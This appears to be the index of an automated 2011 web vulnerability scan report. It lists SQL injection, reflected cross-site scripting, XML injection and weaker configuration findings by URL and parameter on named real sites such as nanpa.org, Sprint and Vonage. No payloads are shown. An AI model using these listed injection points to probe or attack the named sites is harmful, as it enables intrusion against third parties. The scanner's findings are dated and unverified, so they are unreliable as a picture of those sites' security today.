XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 05:49:33 CDT 2011.




1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [frm parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [ga_sid parameter]

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 1]

1.4. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 2]

1.5. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do [codeQueryModel.stateAbbr parameter]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://ds.addthis.com/red/psi/sites/nanpa.org/p.json [callback parameter]

3.2. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]

3.3. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]

3.4. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]

3.5. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]

3.6. http://nanpa.org/about_overview.php [REST URL parameter 1]

3.7. http://nanpa.org/awards_overview.php [REST URL parameter 1]

3.8. http://nanpa.org/education_overview.php [REST URL parameter 1]

3.9. http://nanpa.org/favicon.ico [REST URL parameter 1]

3.10. http://nanpa.org/history.php [REST URL parameter 1]

3.11. http://nanpa.org/recent_forum_posts.php [REST URL parameter 1]

3.12. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [count parameter]

3.13. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [pool parameter]

3.14. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [count parameter]

3.15. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [pool parameter]

3.16. http://www.911enable.com/business/contact_specialist.php [name of an arbitrarily supplied request parameter]

3.17. http://www.911enable.com/business/contact_specialist.php [provenance parameter]

3.18. http://www.commpartnersconnect.com/company [REST URL parameter 1]

3.19. http://www.commpartnersconnect.com/company [number parameter]

3.20. http://www.commpartnersconnect.com/favicon.ico [REST URL parameter 1]

3.21. http://www.etalkup.com/formjsforoneutf8.aspx [workgroup parameter]

3.22. http://www.etalkup.com/getpanelsdk.aspx [workgroup parameter]

3.23. http://www.nanpa.org/favicon.ico [REST URL parameter 1]

3.24. http://www.nanpa.org/forums/external.php [REST URL parameter 1]

3.25. http://www.nanpa.org/forums/external.php [REST URL parameter 2]

3.26. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 1]

3.27. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 2]

3.28. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do [userStageModel.emailAddr parameter]

3.29. http://www.redskye911.com/e911_information_center/default.aspx [_TSM_HiddenField_ parameter]

3.30. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ [Referer HTTP header]

3.31. http://seg.sharethis.com/getSegment.php [__stid cookie]

4. Flash cross-domain policy

4.1. http://ad.doubleclick.net/crossdomain.xml

4.2. http://altfarm.mediaplex.com/crossdomain.xml

4.3. http://api.facebook.com/crossdomain.xml

4.4. http://b.scorecardresearch.com/crossdomain.xml

4.5. http://by.optimost.com/crossdomain.xml

4.6. http://fls.doubleclick.net/crossdomain.xml

4.7. http://img.mediaplex.com/crossdomain.xml

4.8. http://metrics.connectedplanetonline.com/crossdomain.xml

4.9. http://metrics.sprint.com/crossdomain.xml

4.10. http://metrics.vonage.com/crossdomain.xml

4.11. http://now.eloqua.com/crossdomain.xml

4.12. http://pixel.quantserve.com/crossdomain.xml

4.13. http://api.demandbase.com/crossdomain.xml

4.14. http://api.tweetmeme.com/crossdomain.xml

4.15. http://cdn.stumble-upon.com/crossdomain.xml

4.16. http://feeds.bbci.co.uk/crossdomain.xml

4.17. http://googleads.g.doubleclick.net/crossdomain.xml

4.18. http://nanpa.org/crossdomain.xml

4.19. http://newsrss.bbc.co.uk/crossdomain.xml

4.20. http://support.sprint.com/crossdomain.xml

4.21. http://w.sharethis.com/crossdomain.xml

4.22. http://www.awltovhc.com/crossdomain.xml

4.23. http://www.dslreports.com/crossdomain.xml

4.24. http://www.facebook.com/crossdomain.xml

4.25. http://www.nanpa.org/crossdomain.xml

4.26. http://www.stumbleupon.com/crossdomain.xml

4.27. http://anpisolutions.app4.hubspot.com/crossdomain.xml

4.28. http://i.dslr.net/crossdomain.xml

4.29. http://twitter.com/crossdomain.xml

4.30. http://www.vonage.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.3. http://metrics.connectedplanetonline.com/clientaccesspolicy.xml

5.4. http://metrics.sprint.com/clientaccesspolicy.xml

5.5. http://metrics.vonage.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://forum.link2voip.com/favicon.ico

6.2. http://www.secviz.org/node/89

7. XML injection

7.1. http://api.facebook.com/restserver.php [format parameter]

7.2. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 1]

7.3. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 2]

7.4. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 3]

7.5. http://mobilitypoint.westcon.com/favicon.ico [REST URL parameter 1]

7.6. http://www.nanpa.org/forums/external.php [type parameter]

8. SSL cookie without secure flag set

8.1. https://catalyst.fastcatalog.net/

8.2. https://lnp.activationnow.com/lnp/

8.3. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

8.4. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

8.5. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif

8.6. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif

8.7. https://support.connexon.com/images/favicon.ico

8.8. https://support.connexon.com/images/spacer.gif

8.9. https://support.connexon.com/sd/SolutionsHome.sd

8.10. https://support.connexon.com/style/demo.css

8.11. https://support.connexon.com/style/style.css

8.12. https://lnp.activationnow.com/favicon.ico

8.13. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

8.14. https://www.nationalnanpa.com/nas/security/user_reg_mail.do

8.15. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do

9. Session token in URL

9.1. http://api.demandbase.com/api/v2/ip.json

9.2. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

9.3. http://images.smartname.com/scripts/google_afd_v2.js

9.4. http://l.sharethis.com/pview

9.5. https://lnp.activationnow.com/lnp/

9.6. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

9.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

9.8. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

9.9. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

9.10. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

9.11. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

9.12. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

10. SSL certificate

10.1. https://extranet.connexon.com/

10.2. https://gvnwlnp.com/

10.3. https://lnp.activationnow.com/

10.4. https://catalyst.fastcatalog.net/

10.5. https://support.connexon.com/

10.6. https://www.nationalnanpa.com/

11. ASP.NET ViewState without MAC enabled

12. Cookie scoped to parent domain

12.1. http://www.secviz.org/node/89

12.2. http://ad.doubleclick.net/clk

12.3. http://b.scorecardresearch.com/b

12.4. http://id.google.com/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif

12.5. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

12.6. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

12.7. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

12.8. http://nextelonline.nextel.com/tl/set_tl.html

12.9. http://pixel.quantserve.com/pixel

12.10. http://shop2.sprint.com/en/support/faq/wlnp.shtml

12.11. http://www.linkedin.com/companyInsider

12.12. http://www.vonage.com/lp/US/afflpdc/

12.13. http://www.vonage.com/lp/US/afflpdc/index.php

13. Cookie without HttpOnly flag set

13.1. https://catalyst.fastcatalog.net/

13.2. https://lnp.activationnow.com/lnp/

13.3. http://s.clickability.com/s

13.4. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

13.5. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

13.6. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif

13.7. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif

13.8. https://support.connexon.com/images/favicon.ico

13.9. https://support.connexon.com/images/spacer.gif

13.10. https://support.connexon.com/sd/SolutionsHome.sd

13.11. https://support.connexon.com/style/demo.css

13.12. https://support.connexon.com/style/style.css

13.13. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

13.14. http://www.911enable.com/business/contact_specialist.php

13.15. http://www.atis.org/

13.16. http://www.commpartnersconnect.com/company

13.17. http://www.job-search-engine.com/keyword/number-portability/

13.18. http://www.linkedin.com/companyInsider

13.19. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

13.20. http://www.secviz.org/node/89

13.21. http://www.westcongroup.com/

13.22. http://ad.doubleclick.net/clk

13.23. http://anpisolutions.app4.hubspot.com/salog.js.aspx

13.24. http://b.scorecardresearch.com/b

13.25. https://lnp.activationnow.com/favicon.ico

13.26. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

13.27. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

13.28. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

13.29. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

13.30. http://nanpa.com/

13.31. http://nextelonline.nextel.com/tl/set_tl.html

13.32. http://pixel.quantserve.com/pixel

13.33. http://shop2.sprint.com/en/support/faq/wlnp.shtml

13.34. http://tis.org/

13.35. http://twitter.com/javascripts/blogger.js

13.36. http://twitter.com/statuses/user_timeline/secviz.json

13.37. http://www.nanpa.org/forums/external.php

13.38. http://www.nationalnanpa.com/area_code_maps/usmaps/ak.gif

13.39. http://www.nationalnanpa.com/area_code_maps/usmaps/al.gif

13.40. http://www.nationalnanpa.com/area_code_maps/usmaps/ar.gif

13.41. http://www.nationalnanpa.com/area_code_maps/usmaps/az.gif

13.42. http://www.nationalnanpa.com/area_code_maps/usmaps/ca.gif

13.43. http://www.nationalnanpa.com/area_code_maps/usmaps/co.gif

13.44. http://www.nationalnanpa.com/area_code_maps/usmaps/ct.gif

13.45. http://www.nationalnanpa.com/area_code_maps/usmaps/dc.gif

13.46. http://www.nationalnanpa.com/area_code_maps/usmaps/de.gif

13.47. http://www.nationalnanpa.com/area_code_maps/usmaps/fl.gif

13.48. http://www.nationalnanpa.com/area_code_maps/usmaps/ga.gif

13.49. http://www.nationalnanpa.com/area_code_maps/usmaps/hi.gif

13.50. http://www.nationalnanpa.com/area_code_maps/usmaps/ia.gif

13.51. http://www.nationalnanpa.com/area_code_maps/usmaps/id.gif

13.52. http://www.nationalnanpa.com/area_code_maps/usmaps/il.gif

13.53. http://www.nationalnanpa.com/area_code_maps/usmaps/in.gif

13.54. http://www.nationalnanpa.com/area_code_maps/usmaps/ks.gif

13.55. http://www.nationalnanpa.com/area_code_maps/usmaps/ky.gif

13.56. http://www.nationalnanpa.com/area_code_maps/usmaps/la.gif

13.57. http://www.nationalnanpa.com/area_code_maps/usmaps/ma.gif

13.58. http://www.nationalnanpa.com/area_code_maps/usmaps/us.gif

13.59. http://www.nationalnanpa.com/contact_us/index.html

13.60. http://www.nationalnanpa.com/content/img/cm_areaMap.jpg

13.61. http://www.nationalnanpa.com/content/img/codeMap_bg.jpg

13.62. http://www.nationalnanpa.com/content/img/fastTrack_bg.jpg

13.63. http://www.nationalnanpa.com/content/img/feedBack_bg.gif

13.64. http://www.nationalnanpa.com/content/img/hp_img_a.jpg

13.65. http://www.nationalnanpa.com/content/img/hp_img_b.jpg

13.66. http://www.nationalnanpa.com/content/img/leftNav_bg.gif

13.67. http://www.nationalnanpa.com/content/img/legal_bg.gif

13.68. http://www.nationalnanpa.com/content/img/mainbg.gif

13.69. http://www.nationalnanpa.com/content/img/nanpa_hp_logo.gif

13.70. http://www.nationalnanpa.com/content/img/nav_acMap_off.gif

13.71. http://www.nationalnanpa.com/content/img/nav_acMap_on.gif

13.72. http://www.nationalnanpa.com/content/img/nav_act_off.gif

13.73. http://www.nationalnanpa.com/content/img/nav_act_on.gif

13.74. http://www.nationalnanpa.com/content/img/nav_login_off.gif

13.75. http://www.nationalnanpa.com/content/img/nav_login_on.gif

13.76. http://www.nationalnanpa.com/content/img/nav_numRes_off.gif

13.77. http://www.nationalnanpa.com/content/img/nav_numRes_on.gif

13.78. http://www.nationalnanpa.com/content/img/nav_pub_off.gif

13.79. http://www.nationalnanpa.com/content/img/nav_pub_on.gif

13.80. http://www.nationalnanpa.com/content/img/nav_rep_off.gif

13.81. http://www.nationalnanpa.com/content/img/nav_rep_on.gif

13.82. http://www.nationalnanpa.com/content/img/nav_tools_off.gif

13.83. http://www.nationalnanpa.com/content/img/nav_tools_on.gif

13.84. http://www.nationalnanpa.com/content/img/subContent_bg.gif

13.85. http://www.nationalnanpa.com/content/js/browser_ie.js

13.86. http://www.nationalnanpa.com/content/js/dqm_loader.js

13.87. http://www.nationalnanpa.com/content/js/nanpa_nav.js

13.88. http://www.nationalnanpa.com/content/styles/nanpa_css_b.css

13.89. http://www.nationalnanpa.com/content/styles/nanpa_css_nav.css

13.90. http://www.nationalnanpa.com/content/styles/nanpa_css_p.css

13.91. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

13.92. http://www.nationalnanpa.com/nas/public/css/images/layout/list.gif

13.93. http://www.nationalnanpa.com/nas/public/css/neustar.css

13.94. http://www.nationalnanpa.com/nas/public/images/nanpa_hp_logo.gif

13.95. http://www.nationalnanpa.com/nas/public/images/neustar_logo.gif

13.96. http://www.nationalnanpa.com/nas/public/images/px_CCCCCC.gif

13.97. http://www.nationalnanpa.com/nas/public/js/utilities.js

13.98. http://www.vonage-forum.com/forum8.html

13.99. http://www.vonage.com/lp/US/afflpdc/

13.100. http://www.vonage.com/lp/US/afflpdc/index.php

14. Password field with autocomplete enabled

14.1. http://forum.link2voip.com/favicon.ico

14.2. https://gvnwlnp.com/login.aspx

14.3. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

14.4. http://nanpa.org/

14.5. http://nanpa.org/

14.6. http://nanpa.org/about_overview.php

14.7. http://nanpa.org/about_overview.php

14.8. http://nanpa.org/awards_overview.php

14.9. http://nanpa.org/awards_overview.php

14.10. http://nanpa.org/education_overview.php

14.11. http://nanpa.org/education_overview.php

14.12. http://nanpa.org/history.php

14.13. http://nanpa.org/history.php

14.14. https://support.connexon.com/sd/AddSolution.sd

14.15. https://support.connexon.com/sd/Request.sd

14.16. https://support.connexon.com/sd/SolutionsHome.sd

14.17. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

14.18. http://www.911enable.com/login/index.php

14.19. https://www.nationalnanpa.com/nas/security/authUser.do

14.20. https://www.nationalnanpa.com/nas/security/logon.do

14.21. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

14.22. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

14.23. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

14.24. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

14.25. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

14.26. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

14.27. http://www.secviz.org/node/89

15. ASP.NET debugging enabled

15.1. http://gvnwlnp.com/Default.aspx

15.2. https://gvnwlnp.com/Default.aspx

15.3. http://www.etalkup.com/Default.aspx

15.4. http://www.redskye911.com/Default.aspx

16. Referer-dependent response

16.1. http://twitter.com/statuses/user_timeline/secviz.json

16.2. http://www.facebook.com/plugins/like.php

16.3. http://www.stumbleupon.com/hostedbadge.php

17. Cross-domain POST

17.1. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

17.2. http://www.onwav.com/lnp

17.3. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

17.4. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

17.5. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

17.6. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

17.7. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

17.8. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.2. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.3. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.4. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.5. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

18.6. http://fls.doubleclick.net/activityi

18.7. http://forum.link2voip.com/viewtopic.php

18.8. http://googleads.g.doubleclick.net/pagead/ads

18.9. http://googleads.g.doubleclick.net/pagead/ads

18.10. http://googleads.g.doubleclick.net/pagead/ads

18.11. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js

18.12. http://investor.hickorytech.com/phoenix.zhtml

18.13. http://news.google.com/news/search

18.14. http://www.911enable.com/business/contact_specialist.php

18.15. http://www.facebook.com/plugins/like.php

18.16. http://www.google.com/search

18.17. http://www.google.com/search

18.18. http://www.google.com/url

18.19. http://www.google.com/url

18.20. http://www.google.com/url

18.21. http://www.google.com/url

18.22. http://www.google.com/url

18.23. http://www.google.com/url

18.24. http://www.google.com/url

18.25. http://www.google.com/url

18.26. http://www.google.com/url

18.27. http://www.google.com/url

18.28. http://www.google.com/url

18.29. http://www.google.com/url

18.30. http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do

18.31. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

18.32. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

18.33. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

18.34. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

18.35. http://www.stumbleupon.com/badge/embed/1/

18.36. http://www.virtual-phone-number.org/index.php

18.37. http://www.vonage.com/lp/US/afflpdc/

19. Cross-domain script include

19.1. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

19.2. http://fls.doubleclick.net/activityi

19.3. http://googleads.g.doubleclick.net/pagead/ads

19.4. http://investor.hickorytech.com/phoenix.zhtml

19.5. http://nanpa.org/

19.6. http://nanpa.org/about_overview.php

19.7. http://nanpa.org/awards_overview.php

19.8. http://nanpa.org/education_overview.php

19.9. http://nanpa.org/history.php

19.10. http://tis.org/

19.11. http://www.911enable.com/

19.12. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

19.13. http://www.catalysttelecom.com/

19.14. http://www.catalysttelecom.com/error.aspx

19.15. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

19.16. http://www.facebook.com/plugins/like.php

19.17. http://www.hickorytech-is.com/products/cabs.aspx

19.18. http://www.hickorytech-is.com/products/suitesolution-.aspx

19.19. http://www.hickorytech-is.com/products/suitesolution-/usage-pricing-manager.aspx

19.20. http://www.hickorytech.com/

19.21. http://www.hickorytech.com/business-services/data.aspx

19.22. http://www.hickorytech.com/site-map.aspx

19.23. http://www.hickorytech.com/wholesale-services/access-services.aspx

19.24. http://www.hickorytech.com/wholesale-services/fiber-based-transport.aspx

19.25. http://www.hickorytech.com/wholesale-services/network-operations-center.aspx

19.26. http://www.job-search-engine.com/keyword/number-portability/

19.27. http://www.onwav.com/lnp

19.28. http://www.redskye911.com/

19.29. http://www.redskye911.com/e911_information_center/

19.30. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/

19.31. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif

19.32. http://www.redskye911.com/e911_information_center/loadingAnimation.gif

19.33. http://www.redskye911.com/e911_products/

19.34. http://www.redskye911.com/e911_products/e911_anywhere/hosted/

19.35. http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif

19.36. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

19.37. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif

19.38. http://www.redskye911.com/e911_products/e911_anywhere/network_services/

19.39. http://www.redskye911.com/e911_products/loadingAnimation.gif

19.40. http://www.redskye911.com/favicon.ico

19.41. http://www.redskye911.com/knowledge_base/

19.42. http://www.redskye911.com/knowledge_base/loadingAnimation.gif

19.43. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

19.44. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

19.45. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

19.46. http://www.secviz.org/node/89

19.47. http://www.stumbleupon.com/badge/embed/1/

19.48. http://www.vonage-forum.com/forum8.html

19.49. http://www.vonage.com/lp/US/afflpdc/

19.50. http://www.vonage.com/lp/US/afflpdc/index.php

19.51. http://www.westcongroup.com/

19.52. http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce

20. TRACE method is enabled

20.1. http://api.demandbase.com/

20.2. http://connectedplanetonline.com/

20.3. http://metrics.connectedplanetonline.com/

20.4. http://metrics.vonage.com/

20.5. http://mobilitypoint.westcon.com/

20.6. http://netvoipcommunications.com/

20.7. http://support.sprint.com/

20.8. http://tis.org/

20.9. http://tracking.hubspot.com/

20.10. http://www.commpartnersconnect.com/

20.11. http://www.resourcenter.net/

20.12. http://www.stumbleupon.com/

20.13. http://www.virtual-phone-number.org/

20.14. http://www.vonage-forum.com/

20.15. http://www.vonage.com/

20.16. http://www.westcongroup.com/

21. Email addresses disclosed

21.1. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

21.2. http://connectedplanetonline.com/js/jquery-cookie.js

21.3. http://forum.link2voip.com/viewtopic.php

21.4. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

21.5. http://nanpa.com/

21.6. http://nanpa.org/

21.7. http://nanpa.org/about_overview.php

21.8. http://nanpa.org/awards_overview.php

21.9. http://nanpa.org/education_overview.php

21.10. http://nanpa.org/history.php

21.11. http://nanpa.org/javascript/cookieman.js

21.12. http://nanpa.org/javascript/curr_year.js

21.13. http://nanpa.org/javascript/external.js

21.14. http://nanpa.org/javascript/fontsizer.js

21.15. http://nanpa.org/javascript/gen_mm_object.js

21.16. http://nanpa.org/pullout_menus.js

21.17. http://nanpa.org/startup.js

21.18. http://netvoipcommunications.com/additional-services.html

21.19. http://netvoipcommunications.com/js/hoverintent.js

21.20. http://netvoipcommunications.com/pricing.html

21.21. http://www.911enable.com/

21.22. http://www.911enable.com/business.php

21.23. http://www.911enable.com/business/contact_specialist.php

21.24. http://www.911enable.com/business/resource_center/knowledge_base.php

21.25. http://www.911enable.com/login/index.php

21.26. http://www.atis.org/

21.27. http://www.atis.org/cioc_foss.asp

21.28. http://www.google.com/search

21.29. http://www.job-search-engine.com/assets/js/niftycube.js

21.30. http://www.job-search-engine.com/keyword/number-portability/

21.31. http://www.nanpa.org/javascript/cookieman.js

21.32. http://www.nanpa.org/javascript/curr_year.js

21.33. http://www.nanpa.org/javascript/external.js

21.34. http://www.nanpa.org/javascript/fontsizer.js

21.35. http://www.nanpa.org/javascript/gen_mm_object.js

21.36. http://www.nanpa.org/pullout_menus.js

21.37. http://www.nanpa.org/startup.js

21.38. http://www.nationalnanpa.com/contact_us/index.cgi

21.39. http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do

21.40. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

21.41. https://www.nationalnanpa.com/nas/security/authUser.do

21.42. https://www.nationalnanpa.com/nas/security/logon.do

21.43. https://www.nationalnanpa.com/nas/security/user_reg_mail.do

21.44. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do

21.45. https://www.nationalnanpa.com/nas/security/user_reg_pre_step1.do

21.46. https://www.nationalnanpa.com/nas/security/user_reg_pre_step2.do

21.47. https://www.nationalnanpa.com/nas/security/user_reg_step1.do

21.48. http://www.onwav.com/css/style.css

21.49. http://www.redskye911.com/

21.50. http://www.redskye911.com/e911_information_center/

21.51. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/

21.52. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif

21.53. http://www.redskye911.com/e911_information_center/loadingAnimation.gif

21.54. http://www.redskye911.com/e911_products/

21.55. http://www.redskye911.com/e911_products/e911_anywhere/hosted/

21.56. http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif

21.57. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

21.58. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif

21.59. http://www.redskye911.com/e911_products/e911_anywhere/network_services/

21.60. http://www.redskye911.com/e911_products/loadingAnimation.gif

21.61. http://www.redskye911.com/favicon.ico

21.62. http://www.redskye911.com/knowledge_base/

21.63. http://www.redskye911.com/knowledge_base/loadingAnimation.gif

21.64. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

21.65. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

21.66. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

21.67. http://www.secviz.org/node/89

21.68. http://www.sprint.com/assets/scripts/analytics/analyticsFramework.js

21.69. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js

21.70. http://www.westcongroup.com/

21.71. http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce

22. Private IP addresses disclosed

22.1. http://api.facebook.com/restserver.php

22.2. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

22.3. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

22.4. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

22.5. http://static.ak.fbcdn.net/connect.php/js/FB.Share

22.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js

22.7. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

22.8. http://www.facebook.com/extern/login_status.php

22.9. http://www.facebook.com/extern/login_status.php

22.10. http://www.facebook.com/plugins/like.php

22.11. http://www.google.com/sdch/vD843DpA.dct

23. Credit card numbers disclosed

24. Robots.txt file

24.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

24.2. http://altfarm.mediaplex.com/ad/js/12688-127209-4062-0

24.3. http://api.facebook.com/restserver.php

24.4. http://b.scorecardresearch.com/b

24.5. http://by.optimost.com/trial/471/p/landingpage.6cf/40/content.js

24.6. http://cdn.stumble-upon.com/css/badges_su.css

24.7. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

24.8. http://feeds.bbci.co.uk/news/rss.xml

24.9. http://fls.doubleclick.net/activityi

24.10. http://googleads.g.doubleclick.net/pagead/ads

24.11. http://i.dslr.net/css/aj6m.js

24.12. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js

24.13. http://investor.hickorytech.com/phoenix.zhtml

24.14. http://l.addthiscdn.com/live/t00/250lo.gif

24.15. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

24.16. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

24.17. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

24.18. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

24.19. http://nanpa.org/

24.20. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.21. http://nextelonline.nextel.com/tl/set_tl.html

24.22. http://now.eloqua.com/visitor/v200/svrGP.aspx

24.23. http://pixel.quantserve.com/pixel

24.24. http://s.clickability.com/s

24.25. http://shop2.sprint.com/en/support/faq/wlnp.shtml

24.26. http://tis.org/

24.27. http://twitter.com/statuses/user_timeline/secviz.json

24.28. http://www.911enable.com/

24.29. http://www.atis.org/

24.30. http://www.awltovhc.com/image-1791927-2832191

24.31. http://www.catalysttelecom.com/

